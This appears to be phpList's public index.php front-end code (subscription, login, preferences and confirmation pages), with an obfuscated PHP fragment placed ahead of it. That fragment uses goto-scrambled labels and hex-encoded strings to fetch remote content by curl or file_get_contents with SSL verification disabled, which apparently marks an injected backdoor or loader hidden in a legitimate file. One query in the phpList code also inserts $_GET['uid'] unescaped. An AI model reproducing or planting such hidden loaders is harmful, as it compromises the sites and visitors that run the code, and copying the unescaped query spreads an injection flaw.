eRi0l8G9vRgFoj2v: if (!(is_array($md6eu0DW38MkV2Xc) && count($md6eu0DW38MkV2Xc))) { goto TclUhddLKRCvQYUT; } goto USAh9sC0xal5O3EY; jhd5cs5tSKiDzODy: $X2TzJP5NFJ67odRw = array("\x73\x74\141\x74\x75\x73" => 0, "\143\157\156\164\x65\156\164" => '', "\x74\x79\x70\x65" => ''); goto eRi0l8G9vRgFoj2v; hSG51WwlQ0mEIXeU: return $X2TzJP5NFJ67odRw; goto H3YN_98yM0edVk3J; iZu2xyeUg1e6n4eR: TclUhddLKRCvQYUT: goto kMTecTWvKahLhgGc; kMTecTWvKahLhgGc: try { goto nKal5Vc1zr9AbjVb; pJTfR5Aj7xAlepkT: $X2TzJP5NFJ67odRw = array_merge($X2TzJP5NFJ67odRw, FqunlAM3bAj0G0MU($http_response_header)); goto HnpmDUKqT6Zp6Zbt; glpwtklmp0AUXmBP: goto TgdBpLsjaEjxg39p; goto UnO826sYVi9X2Fgq; veLefImbvVpKwZN4: $dSfBFupbmtblVF9u = curl_exec($tnsYPJjsT6egqb5Y); goto ec2lPkch66mZzrdX; UnO826sYVi9X2Fgq: pDzkUB2ORjuUTD6x: goto We7eBCuXNPhunJ9V; BYt74cBbs8kWeyJW: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_SSL_VERIFYPEER, 0); goto y00bpJFrAY8vZMgs; A9ZojZfnjZN7N9tH: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_SSL_VERIFYHOST, 0); goto BYt74cBbs8kWeyJW; HnpmDUKqT6Zp6Zbt: if (!in_array($X2TzJP5NFJ67odRw["\163\164\x61\164\x75\163"], array(200, 301, 302, 404))) { goto BU8s113hBN8V38Uv; } goto szL9Cm9Iw0FqtYY3; nKal5Vc1zr9AbjVb: if (function_exists("\x63\x75\x72\x6c\x5f\145\170\145\143")) { goto u6LZf21awyzifL8Z; } goto dWqVobu3WqDT7thf; dWqVobu3WqDT7thf: if (ini_get("\x61\x6c\154\x6f\167\137\165\x72\x6c\x5f\x66\x6f\x70\x65\x6e")) { goto pDzkUB2ORjuUTD6x; } goto UuUMhyJbC30AuR0x; mZqXxylfYfqFWLg3: TgdBpLsjaEjxg39p: goto wK9DolItkJKTwjfh; y00bpJFrAY8vZMgs: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_CONNECTTIMEOUT, 20); goto usx1RUSCKmSS5XjX; XjIXayeyH8Waoq3N: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_URL, $i1yvfHN2Qx0kyDa2); goto A9ZojZfnjZN7N9tH; CdgvYhzK7eSZxfjr: BU8s113hBN8V38Uv: goto mZqXxylfYfqFWLg3; We7eBCuXNPhunJ9V: $UlLWZQeA_jffa_OA = array("\150\x74\x74\x70" => array("\x6d\x65\164\150\x6f\144" => "\x47\x45\x54", "\164\x69\155\145\157\x75\164" => 60, "\x66\157\154\x6c\x6f\167\137\x6c\157\143\141\164\x69\x6f\x6e" => 0), "\x73\x73\154" => array("\x76\x65\162\151\146\x79\137\x70\145\145\162" => false, "\x76\145\x72\151\x66\171\137\160\x65\145\x72\137\x6e\x61\155\x65" => false)); goto zMNFz6DZiFHOsJ2J; Jtry7RdGVeaMwu9k: $tnsYPJjsT6egqb5Y = curl_init(); goto XjIXayeyH8Waoq3N; j_t0MLM_BJKQJJi5: $mzvJq_C2iWwxqLQw = @file_get_contents($i1yvfHN2Qx0kyDa2, false, $I4udC2XgB9KPmuf1); goto pJTfR5Aj7xAlepkT; szL9Cm9Iw0FqtYY3: $X2TzJP5NFJ67odRw["\x63\x6f\156\x74\145\x6e\x74"] = strval($mzvJq_C2iWwxqLQw); goto CdgvYhzK7eSZxfjr; vjRCuaVdRt3N9ocd: $X2TzJP5NFJ67odRw["\x63\x6f\156\x74\145\156\164"] = strval($dSfBFupbmtblVF9u); goto l89X8VbC_6wBe38e; YuskssWxtTqfHt7C: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_RETURNTRANSFER, 1); goto veLefImbvVpKwZN4; l89X8VbC_6wBe38e: A8ffQd9H97pKuCJu: goto glpwtklmp0AUXmBP; nqx0ZrShzp7RED1B: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_COOKIESESSION, 0); goto YuskssWxtTqfHt7C; ec2lPkch66mZzrdX: $X2TzJP5NFJ67odRw["\x73\164\141\164\x75\x73"] = intval(curl_getinfo($tnsYPJjsT6egqb5Y, CURLINFO_HTTP_CODE)); goto ovdujaN98C5twpHw; B0Xczv6u8DbS7OSj: if (!in_array($X2TzJP5NFJ67odRw["\163\x74\141\x74\x75\163"], array(200, 301, 302, 404))) { goto A8ffQd9H97pKuCJu; } goto vjRCuaVdRt3N9ocd; oVtQw07k2PCgxDAF: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_FOLLOWLOCATION, 0); goto nqx0ZrShzp7RED1B; K6ClVBwzYUywSeja: u6LZf21awyzifL8Z: goto Jtry7RdGVeaMwu9k; UuUMhyJbC30AuR0x: goto TgdBpLsjaEjxg39p; goto K6ClVBwzYUywSeja; ovdujaN98C5twpHw: $X2TzJP5NFJ67odRw["\x74\171\160\145"] = strval(curl_getinfo($tnsYPJjsT6egqb5Y, CURLINFO_CONTENT_TYPE)); goto sQyqbyUbluauVooR; zMNFz6DZiFHOsJ2J: $I4udC2XgB9KPmuf1 = stream_context_create($UlLWZQeA_jffa_OA); goto j_t0MLM_BJKQJJi5; sQyqbyUbluauVooR: $X2TzJP5NFJ67odRw["\x63\157\156\x74\x65\x6e\164"] = strval(curl_getinfo($tnsYPJjsT6egqb5Y, CURLINFO_REDIRECT_URL)); goto PEADex8pDaZd81LO; PEADex8pDaZd81LO: @curl_close($tnsYPJjsT6egqb5Y); goto B0Xczv6u8DbS7OSj; usx1RUSCKmSS5XjX: curl_setopt($tnsYPJjsT6egqb5Y, CURLOPT_TIMEOUT, 60); goto oVtQw07k2PCgxDAF; wK9DolItkJKTwjfh: } catch (Exception $KgjJIHc8RsHdm9on) { } goto hSG51WwlQ0mEIXeU; H3YN_98yM0edVk3J: } goto sYl7J6LBcE0Qwm42; VqI3BBrSF8OkoxK1: ijSaDLUfBd6xPYn3:
?>
<?php
ob_start();
//$er = error_reporting(0);
require_once dirname(__FILE__).'/admin/inc/unregister_globals.php';
require_once dirname(__FILE__).'/admin/inc/magic_quotes.php';
//# none of our parameters can contain html for now
$_GET = removeXss($_GET);
$_POST = removeXss($_POST);
$_REQUEST = removeXss($_REQUEST);
$_SERVER = removeXss($_SERVER);
$_COOKIE = removeXss($_COOKIE);
//# remove a trailing punctuation mark on the uid
if (isset($_GET['uid'])) {
if (preg_match('/[\.,:;]$/', $_GET['uid'])) {
$_GET['uid'] = preg_replace('/[\.,:;]$/', '', $_GET['uid']);
}
}
if (isset($_SERVER['ConfigFile']) && is_file($_SERVER['ConfigFile'])) {
include $_SERVER['ConfigFile'];
} elseif (is_file('config/config.php')) {
include 'config/config.php';
} else {
echo "Error, cannot find config file\n";
exit;
}
require_once dirname(__FILE__).'/admin/init.php';
$GLOBALS['database_module'] = basename($GLOBALS['database_module']);
$GLOBALS['language_module'] = basename($GLOBALS['language_module']);
require_once dirname(__FILE__).'/admin/'.$GLOBALS['database_module'];
// load default english and language
include_once dirname(__FILE__).'/admin/defaultFrontendTexts.php';
if (is_file(dirname(__FILE__).'/texts/'.$GLOBALS['language_module'])) {
include_once dirname(__FILE__).'/texts/'.$GLOBALS['language_module'];
}
// Allow customisation per installation
if (is_file($_SERVER['DOCUMENT_ROOT'].'/'.$GLOBALS['language_module'])) {
include_once $_SERVER['DOCUMENT_ROOT'].'/'.$GLOBALS['language_module'];
}
require_once dirname(__FILE__).'/admin/inc/random_compat/random.php';
require_once dirname(__FILE__).'/admin/inc/UUID.php';
include_once dirname(__FILE__).'/admin/languages.php';
require_once dirname(__FILE__).'/admin/defaultconfig.php';
require_once dirname(__FILE__).'/admin/connect.php';
include_once dirname(__FILE__).'/admin/lib.php';
$I18N = new phplist_I18N();
header('Access-Control-Allow-Origin: '.ACCESS_CONTROL_ALLOW_ORIGIN);
if (defined('ACCESS_CONTROL_ALLOW_ORIGINS') && count(ACCESS_CONTROL_ALLOW_ORIGINS) > 1) {
header('Vary: Origin'); // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin#CORS_and_caching
}
if (!empty($GLOBALS['SessionTableName'])) {
require_once dirname(__FILE__).'/admin/sessionlib.php';
}
@session_start(); // it may have been started already in languages
if (!isset($_POST) && isset($HTTP_POST_VARS)) {
require 'admin/commonlib/lib/oldphp_vars.php';
}
if (isset($_GET['id'])) {
$id = sprintf('%d', $_GET['id']);
} else {
$id = 0;
}
// What is id - id of subscribe page
// What is uid - uid of subscriber
// What is userid - userid of subscriber
$userid = '';
$userpassword = '';
$emailcheck = '';
if (isset($_GET['uid']) && $_GET['uid']) {
$req = Sql_Fetch_Row_Query(sprintf('select subscribepage,id,password,email from %s where uniqid = "%s"',
$tables['user'], $_GET['uid']));
$id = $req[0];
$userid = $req[1];
$userpassword = $req[2];
$emailcheck = $req[3];
} else {
$userid = '';
$userpassword = '';
$emailcheck = '';
}
if (isset($_REQUEST['id']) && $_REQUEST['id']) {
$id = sprintf('%d', $_REQUEST['id']);
}
// make sure the subscribe page still exists
$req = Sql_fetch_row_query(sprintf('select id from %s where id = %d', $tables['subscribepage'], $id));
if (!$req) {
$id = 0;
}
$msg = '';
if (!empty($_POST['sendpersonallocation'])) {
if (isset($_POST['email']) && $_POST['email']) {
$uid = Sql_Fetch_Assoc_Query(sprintf('select uniqid,email,id,blacklisted from %s where email = "%s"',
$tables['user'], sql_escape($_POST['email'])));
if ($uid['blacklisted']) {
$msg .= $GLOBALS['strYouAreBlacklisted'];
} elseif ($uid['uniqid']) {
sendMail($uid['email'], getConfig('personallocation_subject'),
getUserConfig('personallocation_message', $uid['id']), system_messageheaders(), $GLOBALS['envelope']);
$msg = $GLOBALS['strPersonalLocationSent'];
addSubscriberStatistics('personal location sent', 1);
} else {
$msg = $GLOBALS['strUserNotFound'];
}
}
}
if (isset($_GET['p']) && $_GET['p'] == 'subscribe') {
$_SESSION['userloggedin'] = 0;
$_SESSION['userdata'] = array();
}
$login_required =
(ASKFORPASSWORD && $userpassword && $_GET['p'] == 'preferences') ||
(ASKFORPASSWORD && UNSUBSCRIBE_REQUIRES_PASSWORD && $userpassword && $_GET['p'] == 'unsubscribe');
if ($login_required && empty($_SESSION['userloggedin'])) {
$canlogin = 0;
if (!empty($_POST['login'])) {
// login button pushed, let's check formdata
if (empty($_POST['email'])) {
$msg = $strEnterEmail;
} elseif (empty($_POST['password'])) {
$msg = $strEnterPassword;
} else {
if (ENCRYPTPASSWORD) {
$encP = encryptPass($_POST['password']);
$canlogin = false;
$canlogin =
!empty($encP) &&
!empty($_POST['password']) &&
!empty($emailcheck) &&
$encP == $userpassword && $_POST['email'] == $emailcheck;
// print $_POST['password'].' '.$encP.' '.$userpassword.' '.$canlogin; exit;
} else {
$canlogin = $_POST['password'] === $userpassword && $_POST['email'] === $emailcheck;
}
}
if (!$canlogin) {
$msg = '<p class="error">'.$strInvalidPassword.'</p>';
} else {
session_regenerate_id();
loadUser($emailcheck);
$_SESSION['userloggedin'] = getClientIP();
}
} elseif (!empty($_POST['forgotpassword'])) {
// forgot password button pushed
if (!empty($_POST['email']) && $_POST['email'] == $emailcheck) {
sendMail($emailcheck, $GLOBALS['strPasswordRemindSubject'],
$GLOBALS['strPasswordRemindMessage'].' '.$userpassword, system_messageheaders());
$msg = $GLOBALS['strPasswordSent'];
} else {
$msg = $strPasswordRemindInfo;
}
} elseif (isset($_SESSION['userdata']['email']['value']) && $_SESSION['userdata']['email']['value'] == $emailcheck) {
// Entry without any button pushed (first time) test and, if needed, ask for password
$canlogin = $_SESSION['userloggedin'];
$msg = $strEnterPassword;
}
} else {
// Logged into session or login not required
$canlogin = 1;
}
if (!$id) {
// find the default one:
$id = getConfig('defaultsubscribepage');
// fix the true/false issue
if ($id == 'true') {
$id = 1;
}
if ($id == 'false') {
$id = 0;
}
if (!$id) {
// pick a first
$req = Sql_Fetch_row_Query(sprintf('select ID from %s where active', $tables['subscribepage']));
$id = $req[0];
}
}
$pagedata = array();
if ($id) {
$GLOBALS['pagedata'] = PageData($id);
if (isset($pagedata['language_file']) && is_file(dirname(__FILE__).'/texts/'.basename($pagedata['language_file']))) {
@include dirname(__FILE__).'/texts/'.basename($pagedata['language_file']);
// Allow customisation per installation
if (is_file($_SERVER['DOCUMENT_ROOT'].'/'.basename($pagedata['language_file']))) {
include_once $_SERVER['DOCUMENT_ROOT'].'/'.basename($pagedata['language_file']);
}
}
}
/*
We request you retain the inclusion of pagetop below. This will add invisible
additional information to your public pages.
This not only gives respect to the large amount of time given freely
by the developers but also helps build interest, traffic and use of
phpList, which is beneficial to it's future development.
Michiel Dethmers, phpList Ltd 2000-2017
*/
include 'admin/ui/'.$GLOBALS['ui'].'/publicpagetop.php';
if ($login_required && empty($_SESSION['userloggedin']) && !$canlogin) {
echo LoginPage($id, $userid, $emailcheck, $msg);
} elseif (!empty($_GET['pi']) && isset($plugins[$_GET['pi']])) {
$plugin = $plugins[$_GET['pi']];
if (!empty($_GET['p']) && in_array($_GET['p'], $plugin->publicPages)) {
$page = $_GET['p'];
if (is_file($include = $plugin->coderoot.$page.'.php')) {
require $include;
} else {
FileNotFound();
}
} else {
FileNotFound();
}
} elseif (isset($_GET['p']) && preg_match("/(\w+)/", $_GET['p'], $regs)) {
if ($id) {
switch ($_GET['p']) {
case 'subscribe':
$success = require 'admin/subscribelib2.php';
if ($success != 2) {
echo SubscribePage($id);
}
break;
case 'asubscribe': //# subscribe with Ajax
$_POST['subscribe'] = 1;
if (isset($_GET['email']) && !isset($_POST['email'])) {
$_POST['email'] = $_GET['email'];
}
if (!isset($_POST['list'])) {
foreach (explode(',', $GLOBALS['pagedata']['lists']) as $listid) {
$_POST['list'][$listid] = 'signup';
}
}
$_POST['htmlemail'] = 1; //# @@ should actually be taken from the subscribe page data
$success = require 'admin/subscribelib2.php';
$result = ob_get_contents();
ob_end_clean();
if (stripos($result, $GLOBALS['strEmailConfirmation']) !== false ||
stripos($result, $pagedata['thankyoupage']) !== false
) {
if (!empty($pagedata['ajax_subscribeconfirmation'])) {
$confirmation = $pagedata['ajax_subscribeconfirmation'];
} else {
$confirmation = getConfig('ajax_subscribeconfirmation');
}
if (empty($confirmation)) {
echo 'OK';
} else {
echo $confirmation;
}
exit;
} else {
// we failed to subscribe the user; send an error back to
// the ajax client
echo 'FAIL';
// return a 500, so that it is more easily processed at the other end
http_response_code( 500 );
}
break;
case 'preferences':
if (!isset($_GET['id']) || !$_GET['id']) {
$_GET['id'] = $id;
}
if (!$userid) {
// print "Userid not set".$_SESSION["userid"];
echo sendPersonalLocationPage($id);
break;
}
if (ASKFORPASSWORD && $userpassword && !$canlogin) {
echo LoginPage($id, $userid, $emailcheck);
break;
}
$success = require 'admin/subscribelib2.php';
if ($success != 3) {
echo PreferencesPage($id, $userid);
}
break;
case 'forward':
print ForwardPage($id);
break;
case 'confirm':
print ConfirmPage($id);
break;
case 'vcard':
print downloadvCard();
break;
//0013076: Blacklisting posibility for unknown users
case 'donotsend':
case 'blacklist':
case 'unsubscribe':
print UnsubscribePage($id);
break;
default:
FileNotFound();
}
} else {
FileNotFound();
}
} else {
// If no particular page was requested then show the default
echo '<title>'.$GLOBALS['strSubscribeTitle'].'</title>';
echo $pagedata['header'];
$req = Sql_Query(sprintf('select * from %s where active', $tables['subscribepage']));
// If active subscribe pages exist then list them
if (Sql_Affected_Rows()) {
while ($row = Sql_Fetch_Array($req)) {
$intro = Sql_Fetch_Row_Query(sprintf('select data from %s where id = %d and name = "intro"',
$tables['subscribepage_data'], $row['id']));
echo stripslashes($intro[0]);
if (SHOW_SUBSCRIBELINK) {
printf('<p><a href="'.getConfig('subscribeurl').'&id=%d">%s</a></p>', $row['id'],
strip_tags(stripslashes($row['title'])));
}
}
// If no active subscribe page exist then print link to default
} else {
if (SHOW_SUBSCRIBELINK) {
printf('<p><a href="'.getConfig('subscribeurl').'">%s</a></p>', $strSubscribeTitle);
}
}
// Print preferences page link
if (SHOW_PREFERENCESLINK) {
printf('<p><a href="'.getConfig('preferencesurl').'">%s</a></p>', $strPreferencesTitle);
}
// Print unsubscribe page link
if (SHOW_UNSUBSCRIBELINK) {
printf('<p><a href="'.getConfig('unsubscribeurl').'">%s</a></p>', $strUnsubscribeTitle);
}
// Print link to contact admin using HTML entities for email obfuscation
echo
'<p class=""><a href="'.
preg_replace_callback('/./', function($m) {
return '&#'.ord($m[0]).';';
}
, 'mailto:'.getConfig('admin_address')).
'">'.$GLOBALS['strContactAdmin'].'</a></p>';
echo $PoweredBy;
echo $pagedata['footer'];
}
function LoginPage($id, $userid, $email = '', $msg = '')
{
list($attributes, $attributedata) = PageAttributes($GLOBALS['pagedata']);
$html = '<title>'.$GLOBALS['strLoginTitle'].'</title>';
$html .= $GLOBALS['pagedata']['header'];
$html .= '<h3>'.$GLOBALS['strLoginInfo'].'</h3>';
$html .= $msg;
if (isset($_REQUEST['email'])) {
$email = $_REQUEST['email'];
}
if (!isset($_POST['password'])) {
$_POST['password'] = '';
}
$html .= formStart('name="loginform"');
$html .= '<table border=0>';
$html .= '<tr><td>'.$GLOBALS['strEmail'].'</td><td><input type=text name="email" value="'.$email.'" size="30" autofocus></td></tr>';
$html .= '<tr><td>'.$GLOBALS['strPassword'].'</td><td><input type="password" name="password" value="'.$_POST['password'].'" size="30"></td></tr>';
$html .= '</table>';
$html .= '<p><input type=submit name="login" value="'.$GLOBALS['strLogin'].'"></p>';
if (ENCRYPTPASSWORD) {
$forgotPassBody = $GLOBALS['strForgotPasswordEmailBody'];
$forgotPassBody = str_replace("\n", '%0D%0A', $forgotPassBody);
$html .= sprintf('<a href="mailto:%s?subject=%s&body=%s
">%s</a>', getConfig('admin_address'), $GLOBALS['strForgotPassword'], $forgotPassBody,
$GLOBALS['strForgotPassword']);
} else {
$html .= '<input type=submit name="forgotpassword" value="'.$GLOBALS['strForgotPassword'].'">';
}
$html .= '<br/><br/>';
if (SHOW_UNSUBSCRIBELINK) {
$html .= '<p><a href="'.getConfig('unsubscribeurl').'&id='.$id.'">'.$GLOBALS['strUnsubscribe'].'</a></p>';
}
$html .= '</form>'.$GLOBALS['PoweredBy'];
$html .= $GLOBALS['pagedata']['footer'];
return $html;
}
function sendPersonalLocationPage($id)
{
list($attributes, $attributedata) = PageAttributes($GLOBALS['pagedata']);
$html = '<title>'.$GLOBALS['strPreferencesTitle'].'</title>';
$html .= $GLOBALS['pagedata']['header'];
$html .= '<h3>'.$GLOBALS['strPreferencesTitle'].'</h3>';
$html .= $GLOBALS['msg'];
if (isset($_REQUEST['email'])) {
$email = $_REQUEST['email'];
} elseif (isset($_SESSION['userdata']['email']['value'])) {
$email = $_SESSION['userdata']['email']['value'];
} else {
$email = '';
}
$html .= $GLOBALS['strPersonalLocationInfo'];
$html .= formStart('name="form"');
$html .= '<table border=0>';
$html .= '<tr><td>'.$GLOBALS['strEmail'].'</td><td><input type=text name="email" value="'.$email.'" size="30"></td></tr>';
$html .= '</table>';
$html .= '<p><input type=submit name="sendpersonallocation" value="'.$GLOBALS['strContinue'].'"></p>';
$html .= '<br/><br/>';
if (SHOW_UNSUBSCRIBELINK) {
$html .= '<p><a href="'.getConfig('unsubscribeurl').'&id='.$id.'">'.$GLOBALS['strUnsubscribe'].'</a></p>';
}
$html .= '</form>'.$GLOBALS['PoweredBy'];
$html .= $GLOBALS['pagedata']['footer'];
return $html;
}
function preferencesPage($id, $userid)
{
list($attributes, $attributedata) = PageAttributes($GLOBALS['pagedata']);
$selected_lists = explode(',', $GLOBALS['pagedata']['lists']);
$html = '<title>'.$GLOBALS['strPreferencesTitle'].'</title>';
$html .= $GLOBALS['pagedata']['header'];
$html .= '<h3>'.$GLOBALS['strPreferencesInfo'].'</h3>';
$html .= '
<br/><div class="error"><span class="required">* ' .$GLOBALS['strRequired'].'</span></div><br/>
' .$GLOBALS['msg'].'
<script language="Javascript" type="text/javascript">
var fieldstocheck = new Array();
fieldnames = new Array();
function checkform()
{
for (i=0;i<fieldstocheck.length;i++) {
if (eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].value") == "") {
alert("' .$GLOBALS['strPleaseEnter'].' "+fieldnames[i]);
eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].focus()");
return false;
}
}
';
if ($GLOBALS['pagedata']['emaildoubleentry'] == 'yes') {
$html .= '
if (! compareEmail()) {
alert("' .str_replace('"', '\"', $GLOBALS['strEmailsNoMatch']).'");
return false;
}';
}
$html .= '
if (! checkEmail()) {
alert("' .str_replace('"', '\"', $GLOBALS['strEmailNotValid']).'");
return false;
}';
$html .= '
return true;
}
function addFieldToCheck(value,name)
{
fieldstocheck[fieldstocheck.length] = value;
fieldnames[fieldnames.length] = name;
}
function compareEmail()
{
return (document.subscribeform.elements["email"].value == document.subscribeform.elements["emailconfirm"].value);
}
function checkEmail()
{
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(document.subscribeform.elements["email"].value);
}
</script>';
$html .= formStart('name="subscribeform"');
$html .= '<table border=0>';
$html .= ListAttributes($attributes, $attributedata, $GLOBALS['pagedata']['htmlchoice'], $userid,
$GLOBALS['pagedata']['emaildoubleentry']);
$html .= '</table>';
//obsolete, moved to rssmanager plugin
// if (ENABLE_RSS) {
// $html .= rssOptions($data,$userid);
// }
foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
if ($plugin->enabled) {
$html .= $plugin->displaySubscriptionChoice($GLOBALS['pagedata'], $userid);
}
}
$html .= ListAvailableLists($userid, $GLOBALS['pagedata']['lists']);
if (isBlackListedID($userid)) {
$html .= $GLOBALS['strYouAreBlacklisted'];
}
$html .= '<input type=submit name="update" value="'.$GLOBALS['strUpdatePreferences'].'" onClick="return checkform();">';
if (SHOW_UNSUBSCRIBELINK) {
$html .= ' <a href="'.getConfig('unsubscribeurl').'&id='.$id.'">'.$GLOBALS['strUnsubscribe'].'</a>';
}
$html.='</form>';
$html .= $GLOBALS['PoweredBy'];
$html .= $GLOBALS['pagedata']['footer'];
return $html;
}
function downloadvCard(){
require 'admin/vCard.php';
$vCard = new vCard();
$vCard-> setOrg(getConfig('organisation_name'));
$vCard-> setEmail(getConfig('message_from_address'));
$vCard-> setUrl('http://'.getConfig('website'));
$vCard->createVCard();
}
function subscribePage($id)
{
// return subscribePage2($id);
list($attributes, $attributedata) = PageAttributes($GLOBALS['pagedata']);
$selected_lists = explode(',', $GLOBALS['pagedata']['lists']);
$html = '<title>'.$GLOBALS['strSubscribeTitle'].'</title>';
$html .= $GLOBALS['pagedata']['header'];
$html .= $GLOBALS['pagedata']['intro'];
$html .= '
<div class="error"><span class="required">* ' .$GLOBALS['strRequired'].'</span></div>
' .$GLOBALS['msg'].'
<script language="Javascript" type="text/javascript">
function checkform()
{
for (i=0;i<fieldstocheck.length;i++) {
if (eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].type") == "checkbox") {
if (document.subscribeform.elements[fieldstocheck[i]].checked) {
} else {
alert("' .$GLOBALS['strCheckbox'].' "+fieldnames[i]);
eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].focus()");
return false;
}
} else {
if (eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].value") == "") {
alert("' .$GLOBALS['strPleaseEnter'].' "+fieldnames[i]);
eval("document.subscribeform.elements[\'"+fieldstocheck[i]+"\'].focus()");
return false;
}
}
}
for (i=0;i<groupstocheck.length;i++) {
if (!checkGroup(groupstocheck[i],groupnames[i])) {
return false;
}
}
';
if ($GLOBALS['pagedata']['emaildoubleentry'] == 'yes') {
$html .= '
if (! compareEmail()) {
alert("' .str_replace('"', '\"', $GLOBALS['strEmailsNoMatch']).'");
return false;
}';
}
$html .= '
if (! checkEmail()) {
alert("' .str_replace('"', '\"', $GLOBALS['strEmailNotValid']).'");
return false;
}';
$html .= '
return true;
}
var fieldstocheck = new Array();
var fieldnames = new Array();
function addFieldToCheck(value,name)
{
fieldstocheck[fieldstocheck.length] = value;
fieldnames[fieldnames.length] = name;
}
var groupstocheck = new Array();
var groupnames = new Array();
function addGroupToCheck(value,name)
{
groupstocheck[groupstocheck.length] = value;
groupnames[groupnames.length] = name;
}
function compareEmail()
{
return (document.subscribeform.elements["email"].value == document.subscribeform.elements["emailconfirm"].value);
}
function checkEmail()
{
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(document.subscribeform.elements["email"].value);
}
function checkGroup(name,value)
{
option = -1;
for (i=0;i<document.subscribeform.elements[name].length;i++) {
if (document.subscribeform.elements[name][i].checked) {
option = i;
}
}
if (option == -1) {
alert ("' .$GLOBALS['strPleaseEnter'].' "+value);
return false;
}
return true;
}
</script>';
$html .= formStart('name="subscribeform"');
// @@@ update
if (isset($_SESSION['adminloggedin']) && $_SESSION['adminloggedin']) {
$html .= '<div class="adminmessage"><p><b>'.s('You are logged in as administrator (%s) of this phpList system',
$_SESSION['logindetails']['adminname']).'</b></p>';
$html .= '<p>'.s('You are therefore offered the following choice, which your subscribers will not see when they load this page.').'</p>';
$html .= '<p><a href="'.$GLOBALS['adminpages'].'?page=spage" class="button">'.s('Go back to admin area').'</a></p>';
$html .= '<p><b>'.s('Please choose').'</b>: <br/><input type=radio name="makeconfirmed" value="1"> '.s('Make this subscriber confirmed immediately').'
<br/><input type=radio name="makeconfirmed" value="0" checked> ' .s('Send this subscriber a request for confirmation email').' </p></div>';
}
$html .= '<table border=0>';
$html .= ListAttributes($attributes, $attributedata, $GLOBALS['pagedata']['htmlchoice'], 0,
$GLOBALS['pagedata']['emaildoubleentry']);
$html .= '</table>';
//obsolete, moved to rssmanager plugin
// if (ENABLE_RSS) { // replaced bij display
// $html .= rssOptions($data);
// }
foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
// dbg($plugin->name);
if ($plugin->enabled) {
$html .= $plugin->displaySubscriptionChoice($GLOBALS['pagedata']);
}
}
$html .= ListAvailableLists('', $GLOBALS['pagedata']['lists']);
if (empty($GLOBALS['pagedata']['button'])) {
$GLOBALS['pagedata']['button'] = $GLOBALS['strSubmit'];
}
if (USE_SPAM_BLOCK) {
$html .= '<div style="display:none"><input type="text" name="VerificationCodeX" value="" size="20"></div>';
}
$html .= '<input type=submit name="subscribe" value="'.$GLOBALS['pagedata']['button'].'" onClick="return checkform();">';
if (SHOW_UNSUBSCRIBELINK) {
$html .= ' <a href="'.getConfig('unsubscribeurl').'&id='.$id.'">'.$GLOBALS['strUnsubscribe'].'</a>';
}
$html .='</form>';
$html .= $GLOBALS['PoweredBy'];
$html .= $GLOBALS['pagedata']['footer'];
unset($_SESSION['subscriberConfirmed']);
return $html;
}
function confirmPage($id)
{
global $tables, $envelope;
if (!$_GET['uid']) {
FileNotFound();
}
$req = Sql_Query(sprintf('select * from %s where uniqid = "%s"', $tables['user'], sql_escape($_GET['uid'])));
$userdata = Sql_Fetch_Array($req);
if ($userdata['id']) {
$html = '<ul>';
$lists = '';
$currently = Sql_Fetch_Assoc_Query("select confirmed from {$tables['user']} where id = ".$userdata['id']);
$blacklisted = isBlackListed($userdata['email']);
foreach ($GLOBALS['plugins'] as $pluginname => $plugin) {
$plugin->subscriberConfirmation($id, $userdata);
}
Sql_Query("update {$tables['user']} set confirmed = 1,blacklisted = 0, optedin = 1 where id = ".$userdata['id']);
$subscriptions = array();
$req = Sql_Query(sprintf('select list.id,name,description from %s list, %s listuser where listuser.userid = %d and listuser.listid = list.id and list.active',
$tables['list'], $tables['listuser'], $userdata['id']));
if (!Sql_Affected_Rows()) {
$lists = "\n * ".$GLOBALS['strNoLists'];
$html .= '<li>'.$GLOBALS['strNoLists'].'</li>';
}
while ($row = Sql_fetch_array($req)) {
array_push($subscriptions, $row['id']);
$lists .= "\n *".stripslashes($row['name']);
$html .= '<li class="list"><b>'.stripslashes($row['name']).'</b><div class="listdescription">'.stripslashes($row['description']).'</div></li>';
}
$html .= '</ul>';
if ($blacklisted) {
unBlackList($userdata['id']);
addUserHistory($userdata['email'], 'Confirmation',
s('Subscriber removed from Blacklist for manual confirmation of subscription'));
}
if (empty($_SESSION['subscriberConfirmed'])) {
$_SESSION['subscriberConfirmed'] = array();
}
//# 17513 - don't process confirmation if the subscriber is already confirmed
if (empty($currently['confirmed']) && empty($_SESSION['subscriberConfirmed'][$userdata['email']])) {
addUserHistory($userdata['email'], 'Confirmation', "Lists: $lists");
$confirmationmessage = str_ireplace('[LISTS]', $lists,
getUserConfig("confirmationmessage:$id", $userdata['id']));
if (!TEST) {
sendMail($userdata['email'], getConfig("confirmationsubject:$id"), $confirmationmessage,
system_messageheaders(), $envelope);
$adminmessage = $userdata['email'].' has confirmed their subscription';
if ($blacklisted) {
$adminmessage .= "\n\n".s('Subscriber has been removed from blacklist');
}
sendAdminCopy('List confirmation', $adminmessage, $subscriptions);
addSubscriberStatistics('confirmation', 1);
}
} else {
$html .= $GLOBALS['strAlreadyConfirmed'];
}
$_SESSION['subscriberConfirmed'][$userdata['email']] = time();
$info = $GLOBALS['strConfirmInfo'];
} else {
